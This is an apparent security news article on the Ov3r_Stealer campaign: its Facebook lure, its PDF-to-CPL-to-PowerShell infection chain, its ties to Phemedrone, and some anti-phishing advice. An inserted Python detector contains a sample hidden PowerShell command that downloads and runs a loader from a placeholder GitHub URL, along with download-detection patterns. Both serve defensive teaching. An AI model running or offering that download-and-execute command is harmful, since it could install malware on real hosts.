
Ov3r_Stealer Malware

Threat actors are exploiting bogus job advertisements on Facebook to deceive potential victims into unwittingly installing a new Windows-based malware known as Ov3r_Stealer. This threatening software is specifically crafted to pilfer credentials and crypto wallets, forwarding the collected data to a Telegram channel monitored by the threat actor.

Ov3r_Stealer exhibits a wide range of capabilities, including the extraction of IP address-based location, hardware information, passwords, cookies, credit card details, auto-fill data, browser extensions, crypto wallets, Microsoft Office documents, and a list of installed security products on the compromised host.

Although the ultimate objective of this campaign remains unclear, the obtained information is probably being offered for sale to other threat actors. Alternatively, Ov3r_Stealer may undergo updates over time, potentially transforming into a loader similar to QakBot, facilitating the deployment of additional payloads, such as ransomware.

The Attack Chain Deploying the Ov3r_Stealer Malware

The attack begins with a weaponized PDF file that falsely presents itself as a document stored on OneDrive and urges the user to click an embedded 'Access Document' button. Researchers have traced the distribution of this PDF to a deceptive Facebook account posing as Amazon CEO Andy Jassy and to fraudulent Facebook ads for digital advertising jobs.

Upon clicking the button, users receive an internet shortcut (.URL) file disguised as a DocuSign document hosted on Discord's content delivery network (CDN). This shortcut file serves as a pathway to deliver a control panel item (.CPL) file, which is then executed using the Windows Control Panel process binary ('control.exe').

Executing the CPL file initiates the retrieval of a PowerShell loader ('DATA1.txt') from a GitHub repository, ultimately leading to the launch of Ov3r_Stealer.
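A defender-side check for the chain described above, added here as an example and not part of the original page: a small Python detector run over constructed Sysmon-style process-creation records that flags a .CPL loaded by control.exe or rundll32.exe from outside System32, and a PowerShell child of that CPL host performing a web download (the DATA1.txt loader step). The event lines, file names and repository URL are constructed placeholders.

```python
import re

# Constructed Sysmon-style process-creation records (not real telemetry).
# Each line: ParentImage|Image|CommandLine. The GitHub URL is a placeholder.
SAMPLE_EVENTS = [
    r"explorer.exe|C:\Windows\System32\control.exe|control.exe C:\Users\bob\Downloads\DocuSign.cpl",
    r"control.exe|C:\Windows\System32\rundll32.exe|rundll32.exe shell32.dll,Control_RunDLL C:\Users\bob\Downloads\DocuSign.cpl",
    r"rundll32.exe|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe|powershell -w hidden -c iex (iwr https://raw.githubusercontent.com/EXAMPLE-ACCOUNT/EXAMPLE-REPO/main/DATA1.txt)",
    r"explorer.exe|C:\Windows\System32\control.exe|control.exe",  # benign: Control Panel opened normally
    r"explorer.exe|C:\Windows\System32\control.exe|control.exe C:\Windows\System32\timedate.cpl",  # benign applet
]

CPL_ARG = re.compile(r"(?P<path>[A-Za-z]:\\[^\s]+\.cpl)", re.IGNORECASE)
SYSTEM32 = re.compile(r"^[A-Za-z]:\\windows\\system32\\", re.IGNORECASE)
PS_DOWNLOAD = re.compile(r"(iwr|invoke-webrequest|downloadstring|downloadfile|invoke-restmethod)", re.IGNORECASE)
CPL_HOSTS = ("control.exe", "rundll32.exe")  # binaries that host Control Panel items


def parse_event(line):
    """Split one record into parent basename, image basename and raw command line."""
    parent, image, cmdline = line.split("|", 2)
    return {"parent": parent.lower(), "image": image.rsplit("\\", 1)[-1].lower(), "cmdline": cmdline}


def detect(lines):
    """Return (rule_name, line) for each event matching a step of the CPL -> PowerShell chain."""
    hits = []
    for line in lines:
        ev = parse_event(line)
        # Step 1: a .cpl passed to control.exe / rundll32 from a non-System32 path (e.g. a download folder).
        if ev["image"] in CPL_HOSTS:
            m = CPL_ARG.search(ev["cmdline"])
            if m and not SYSTEM32.match(m.group("path")):
                hits.append(("cpl_outside_system32", line))
        # Step 2: PowerShell spawned by the CPL host and fetching content from the web (loader retrieval).
        if ev["image"] == "powershell.exe" and ev["parent"] in CPL_HOSTS and PS_DOWNLOAD.search(ev["cmdline"]):
            hits.append(("ps_download_from_cpl_chain", line))
    return hits


if __name__ == "__main__":
    for rule, line in detect(SAMPLE_EVENTS):
        print(rule, "<-", line)
```

Both benign records (Control Panel opened with no argument, and a built-in applet under System32) produce no hit, so the rules key on the unusual file location and parent chain rather than on control.exe itself.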

Similarities Between Ov3r_Stealer and Other Malware Threats

Cybersecurity researchers highlight that threat actors employed a nearly identical infection chain to deploy another stealer known as the Phemedrone Stealer, exploiting the Microsoft Windows Defender SmartScreen bypass vulnerability (CVE-2023-36025, CVSS score: 8.8). The resemblance extends further, with the utilization of the GitHub repository (nateeintanan2527) and the presence of code-level similarities between Ov3r_Stealer and Phemedrone. It is conceivable that Phemedrone has undergone repurposing and rebranding as Ov3r_Stealer, with the primary distinction being that Phemedrone is coded in C#.

To reinforce the link between the two stealers, the threat actor has been observed sharing news reports about the Phemedrone Stealer on their Telegram channels to enhance the 'street cred' of their malware-as-a-service (MaaS) business.

One of the messages observed reads, 'My custom stealer is making headlines, showcasing its evasiveness. I'm the developer behind it, so thrilled right now.' The threat actors express frustration over the fact that despite their efforts to keep everything 'in memory,' threat hunters managed to 'reverse the entire exploit chain.'

How Can You Avoid Phishing Attacks that Deliver Malware Threats?

Avoiding phishing attacks that deliver malware threats requires a combination of vigilance, awareness, and the adoption of best practices for online security. Here are some key steps users can take to safeguard themselves from falling victim to phishing attacks:

  • Be Skeptical of Unsolicited Emails: Avoid opening emails from unknown senders. Be cautious even if the email appears to come from a known source; verify the sender's email address if in doubt.
  • Verify URLs and Links: Hover over email links to preview the URL before clicking. Verify the website's legitimacy by comparing the URL in the email to the official website's address.
  • Check Email Content for Red Flags: Look for spelling and grammar errors, which can indicate phishing attempts. Be wary of urgent or threatening language that pressures you to take immediate action.
  • Update and Use Security Software: Keep your operating system, anti-malware software, and applications current. Use reputable security software to provide real-time protection against malware.
  • Prepare Yourself and Stay Informed: Stay informed about the latest phishing tactics and malware threats. Educate yourself on common phishing indicators, such as generic greetings and requests for sensitive information.
  • Be Cautious with Attachments: Avoid opening attachments from unknown or unexpected sources. Corroborate the legitimacy of the sender before downloading or opening attachments.
  • Watch for Social Engineering Tactics: Be cautious of requests for sensitive information, especially passwords or financial details. Verify the identity of individuals or organizations making unusual requests through a trusted channel.

By incorporating these practices into your online behavior, you can significantly reduce the risk of falling victim to phishing attacks that deliver malware. Staying vigilant and continually updating your knowledge of cybersecurity best practices is crucial in the ever-evolving landscape of online threats.
